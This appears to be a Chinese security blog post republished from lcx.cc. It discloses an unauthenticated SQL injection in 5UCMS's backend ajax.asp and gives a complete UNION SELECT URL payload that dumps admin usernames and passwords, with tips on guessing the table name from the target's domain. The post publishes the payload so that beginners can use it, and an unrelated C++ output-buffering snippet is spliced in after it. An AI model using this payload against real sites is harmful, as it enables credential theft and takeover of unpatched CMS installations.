By:鬼哥
后台目录/ajax.asp
因未进行后台用户验证,导致未登陆也可访问此文件,文件存在sql注入。
我今天进官方看了下好象漏洞他们已经发出了修复公告了,这里我把利用公布出来 直接暴出后台帐号密码。
ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from xxxx_Admin&id=1%20and%201=2%20UNION%20select%201%20from xxxx_Admin xxxx_Admin这个表名一般都是他们在安装的时候自定以的,一般都是用域名 比如www.xxxa.com这个站 表名可能就是xxxa_admin 大家自己修改。没什么技术含量 一般新手暴不出来所以才发出来
说实话他们的程序还是比较安全的能搞出个也不错了。对于我们这些菜鸟来说。
出现:True|False|ERR: Object required 证明表名添写错误了。
成功如下图
文章来源于lcx.cc:5UCMS 漏洞利用
VC,C,C++,控制台输出,立即输出,刷新缓冲区;C++ 立即输出、刷新缓冲区: std::cout endl = n + 刷新缓冲区 该函数在函数库 iostream 中。 文章来源于lcx.cc:C、C++ 控制台输出 立即输出 刷新缓冲区相关推荐: 贝…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论